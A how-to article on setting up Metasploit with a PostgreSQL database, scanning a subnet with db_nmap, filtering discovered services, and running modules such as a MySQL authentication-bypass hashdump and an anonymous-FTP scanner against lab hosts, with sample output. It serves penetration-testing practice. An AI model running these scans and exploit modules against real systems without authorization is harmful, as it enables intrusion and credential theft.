All HowTo's Cybersecurity Linux PostgreSQL Redhat, Fedora and CentOS Linux Ubuntu, Mint & Debian Linux Web Servers

Configure Metasploit with NMap and the Database – Advanced

This article walks you through the process of installing, configuring and running scans using Metasploit and Nmap. Both CentOS 7 and Ubuntu 20.04 are discussed. Our objective is to be able to run nmap scans and have the results go into a database so we can filter the results later and then use Metasploit to exploit based on our options given the exposed services on hosts discovered in the scans. This article is based on details from several places including:

https://fedoraproject.org/wiki/Metasploit_Postgres_Setup
https://docs.rapid7.com/metasploit/no-database-connection/
https://www.offensive-security.com/metasploit-unleashed/using-databases/

Setting everything up

Install Postgres and some other tools we generally use:
CentOS:

yum install postgresql postgresql-server nmap curl wget tcpdump

Ubuntu:

apt install postgresql postgresql-contrib nmap curl wget tcpdump

Install Metasploit:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

Run the initial DB setup. This also creates some directories we need:
CentOS:

postgresql-setup initdb

Update your configuration file. For my system, only the lines indicated below were needed in the file. All other lines were removed. Take a backup of the file before removing anything:

CentOS: /var/lib/pgsql/data/pg_hba.conf
Ubuntu: /etc/postgresql/12/main/pg_hba.conf

CentOS:

host    msf_database    msf_user        127.0.0.1/32            md5

Ubuntu:

local   all             postgres                                peer
local   all             all                                     peer
host    all             all             127.0.0.1/32            md5
host    msf_database    msf_user        127.0.0.1/32            md5

The remainder of this article should be the same on both CentOS and Ubuntu.

Enable and start the DB:

systemctl enable postgresql
systemctl restart postgresql

Create the DB and user:

su postgres
createuser msf_user -P
createdb --owner=msf_user msf_database
	Ignore directory permission errors. 
exit

Create the file “/opt/metasploit-framework/embedded/framework/config/database.yml” and add the following content. Change the password to whatever you set in the above steps:

development:
adapter: "postgresql"
database: "msf_database"
username: "msf_user"
password: "MYPASSWORD"
port: 5432
host: "localhost"
pool: 256
timeout: 5
production:
adapter: "postgresql"
database: "msf_database"
username: "msf_user"
password: "MYPASSWORD"
port: 5432
host: "localhost"
pool: 256
timeout: 5

Run Metasploit and see if you can connect to the database. Metasploit is usually executable from “/opt/metasploit-framework/bin”:

msfconsole
db_connect msf_user:[email protected]:5432/msf_database
db_status

Creating a workspace to keep things separate

If you’re a pen-tester with multiple clients, or you want to keep multiple scans separate, use the “workspace” feature. It’s basically a name-space, a way of keeping results logically separate.

Create a Workspace (see details here “https://docs.rapid7.com/metasploit/managing-workspaces/”) and switch to it:

# workspace -a TestWork
# workspace TestWork

Scan a subnet and add it to our database

And conduct a scan of your target subnet:

# db_nmap -sV 192.168.1.0/24

192.168.1.143  443   tcp    ssl/https  open      VMware ESXi SOAP API 6.5.0
192.168.1.193  443   tcp    ssl/http   open      Microsoft IIS httpd 10.0
192.168.1.179  443   tcp    ssl/http   open      Apache httpd Express

TIP: The -sV tells nmap to get more details about the services listening on ports. Ie, version numbers.

The above scan is saved to the DB. Now we can sort through the results using basic queries. For example, get all hosts with port 443 or 3306 open:

# services -p 443,3306 -u

host           port  proto  name   state  info
----           ----  -----  ----   -----  ----
192.168.1.175  443   tcp    ssl/http   open      Apache httpd 2.4
192.168.1.176  443   tcp    ssl/http   open      Apache httpd 2.4
192.168.1.177  443   tcp    ssl/http   open      Apache httpd Express
192.168.1.178  443   tcp    ssl/http   open      Apache httpd Express
192.168.1.179  443   tcp    ssl/http   open      Apache httpd Express
192.168.1.143  3306  tcp    mysql  open   MySQL 5.5.5-10.3.28-MariaDB

TIP: The -p allows you to list comma separated port numbers. The -u shows only hosts that list the given port/s as open.

Now we can search for exploits that match our targets. In this example, we’ll focus on exploits relating to “mysql” with a rank of “excellent”:

# search rank:excellent mysql

Actually conducting an exploit attempt:

msf6 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > options

Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS file:/tmp/msf-db-rhosts-20210824-1501072-r8icdz yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root yes The username to authenticate as

msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set rhost 192.168.1.143
rhost => 192.168.1.143
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run

[+] 192.168.1.143:3306 - 192.168.1.143:3306 The server allows logins, proceeding with bypass test
[*] 192.168.1.143:3306 - 192.168.1.143:3306 Authentication bypass is 10% complete
[*] 192.168.1.143:3306 - 192.168.1.143:3306 Authentication bypass is 20% complete
[*] 192.168.1.143:3306 - 192.168.1.143:3306 Authentication bypass is 30% complete
...
[*] 192.168.1.143:3306 - 192.168.1.143:3306 Authentication bypass is 90% complete
[*] 192.168.1.143:3306 - 192.168.1.143:3306 Authentication bypass is 100% complete
[-] 192.168.1.143:3306 - 192.168.1.143:3306 Unable to bypass authentication, this target may not be vulnerable
[*] 192.168.1.143:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I suppose it’s good that the test server was not successfully exploited.

Exploit all matching machines

Suppose we want to discover all target computers with FTP exposed and the anonymous feature enabled. We would filter our previous db_nmap results – but this time add the “-R” option with the “services” command. Here’s a full example:

use scanner/ftp/anonymous
services -p 21 -R
run

The above does so much for us. It gathers all computers from a previous db_nmap scan that lists port 21 as open (FTP), and then adds those computers/targets to the “RHOSTS” variable.

Continuous scanning

You can run your scans in the background on a schedule using the following example command. Put this into a script of cronjob for scheduling:

# nohup msfconsole -x "db_connect msf_user:[email protected]:5432/msf_database" -x "db_nmap -A 192.168.1.0/24" &

Check on the progress by running:

tail -f nohup.out

Troubleshooting

If you have trouble, it’s likely to do with the database. You can see if Metasploit is the issue or the DB config by trying to connect to it using the psgl cli command:

psql -h 127.0.0.1 -U msf_user --password -d msf_database

If you get the error “Couldn’t open a raw socket. Error: Permission denied (13)” when using nmap in WSL, try this command from the shell as root. Make sure NMap actually exists in this location or change it accordingly:

alias nmap='"/mnt/c/Program Files (x86)/Nmap/nmap.exe"'

If you’re using Windows Subsystem for Linux (WSL), consider upgrading to version 2:

https://www.configserverfirewall.com/windows-10/convert-wsl-1-linux-distribution-to-wsl-2/

Leave a Reply

Your email address will not be published. Required fields are marked *